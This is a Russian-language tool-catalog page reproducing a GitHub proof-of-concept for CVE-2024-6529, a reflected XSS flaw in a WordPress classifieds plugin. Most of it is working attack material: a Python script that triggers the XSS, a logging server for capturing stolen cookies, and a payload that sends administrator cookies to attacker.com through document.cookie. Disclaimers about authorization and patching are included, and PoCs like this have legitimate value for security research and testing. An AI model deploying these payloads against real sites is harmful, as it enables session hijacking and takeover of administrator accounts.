Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-6529 — Скрипты доказательства концепции, демонстрирующие уязвимости отраженного XSS и кражи cookie в плагинах WordPress, для авторизованного тестирования безопасности и исследования уязвимостей. | Kitploit
Инструменты/GitHubGitHub/abdurahmon3236/cve-2024-6529
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийФишингТестирование на ПроникновениеСоциальная инженерия
GitHubabdurahmon3236/cve-2024-6529

CVE-2024-6529

Скрипты доказательства концепции, демонстрирующие уязвимости отраженного XSS и кражи cookie в плагинах WordPress, для авторизованного тестирования безопасности и исследования уязвимостей.

Репозиторий
2 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Proof of Concept (PoC) для уязвимостей в плагинах WordPress

Этот репозиторий содержит скрипты Proof of Concept (PoC) для различных уязвимостей, обнаруженных в разных плагинах WordPress. Эти скрипты демонстрируют, как злоумышленники могут использовать эти уязвимости для выполнения вредоносных действий.

Содержание

  • Охваченные уязвимости
  • Настройка и использование
    • Отражённый XSS в плагине Ultimate Classified Listings
    • Кража куки с помощью XSS
  • Важные замечания

Охваченные уязвимости

  1. Отражённый межсайтовый скриптинг (XSS) в плагине Ultimate Classified Listings

    • Уязвимость в плагине Ultimate Classified Listings для WordPress до версии 1.4 позволяет злоумышленникам выполнять произвольный JavaScript путём внедрения вредоносных скриптов через неочищенные параметры.
  2. Кража куки с помощью XSS

    • Демонстрирует, как злоумышленник может использовать уязвимость отражённого XSS для кражи куки пользователей с высокими привилегиями, например, администраторов, отправляя куки на вредоносный сервер.

Настройка и использование

Отражённый XSS в плагине Ultimate Classified Listings

Этот PoC демонстрирует, как использовать уязвимость отражённого XSS в плагине Ultimate Classified Listings.

  1. Определите уязвимый параметр:

    • Предположим, что уязвимым параметром является search в URL http://example.com/classifieds.
  2. Создайте вредоносный URL:

    • Вредоносный URL может включать полезную нагрузку для выполнения диалогового окна:
      root@kitploit:~
      http://example.com/classifieds?search=<script>alert('XSS')</script>
      
  3. Запустите скрипт PoC:

    • Сохраните следующий скрипт как xss_poc.py и запустите его.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    payload = "<script>alert('XSS')</script>"  # XSS payload
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Кража куки с помощью XSS

Этот PoC демонстрирует, как злоумышленник может использовать уязвимость отражённого XSS для кражи куки у пользователей с высокими привилегиями.

  1. Настройка вредоносного сервера:

    • Сохраните следующий скрипт как malicious_server.py и запустите его, чтобы запустить сервер, который записывает входящие запросы (включая куки).
    root@kitploit:~
    from http.server import BaseHTTPRequestHandler, HTTPServer
    import logging
    
    class RequestHandler(BaseHTTPRequestHandler):
        def do_GET(self):
            logging.info(f"Received request: {self.headers}")
            self.send_response(200)
            self.end_headers()
    
    def run(server_class=HTTPServer, handler_class=RequestHandler, port=8080):
        logging.basicConfig(filename='server.log', level=logging.INFO)
        server_address = ('', port)
        httpd = server_class(server_address, handler_class)
        logging.info(f'Starting server on port {port}...')
        httpd.serve_forever()
    
    if __name__ == "__main__":
        run()
    
  2. Создайте полезную нагрузку для кражи куки:

    • Создайте полезную нагрузку, которая отправляет куки администратора на вредоносный сервер:
      root@kitploit:~
      http://example.com/classifieds?search=<script>new Image().src='http://attacker.com:8080?cookie='+document.cookie;</script>
      
  3. Запустите скрипт PoC:

    • Сохраните следующий скрипт как steal_cookies_poc.py и запустите его.
    root@kitploit:~
    import requests
    
    # Configuration
    target_url = "http://example.com/classifieds"  # Change this to the target site's URL
    attacker_server = "http://attacker.com:8080"  # Change this to your malicious server's URL
    payload = f"<script>new Image().src='{attacker_server}?cookie='+document.cookie;</script>"
    
    def trigger_xss():
        # Construct the malicious URL
        malicious_url = f"{target_url}?search={payload}"
    
        # Send a GET request to the malicious URL
        response = requests.get(malicious_url)
    
        # Check if the payload is reflected in the response
        if payload in response.text:
            print("[+] XSS payload reflected in the response.")
            print("[+] Malicious URL:", malicious_url)
        else:
            print("[-] XSS payload not reflected in the response.")
    
    if __name__ == "__main__":
        trigger_xss()
    

Важные замечания

  • Разрешения: Убедитесь, что у вас есть явное разрешение на тестирование этих уязвимостей на целевом сайте. Несанкционированный доступ является незаконным и неэтичным.
  • Тестовая среда: Выполняйте эти тесты в контролируемой среде, чтобы избежать влияния на рабочие системы.
  • Устранение уязвимости: Обновите плагин Ultimate Classified Listings до версии 1.4 или новее. Всегда очищайте и экранируйте пользовательские данные перед включением их в вывод.

Эти PoC демонстрируют, как злоумышленник может использовать уязвимости в плагинах WordPress для выполнения вредоносных действий. Всегда обновляйте своё программное обеспечение и следуйте лучшим практикам безопасности, чтобы предотвратить такие уязвимости.

Скачать инструмент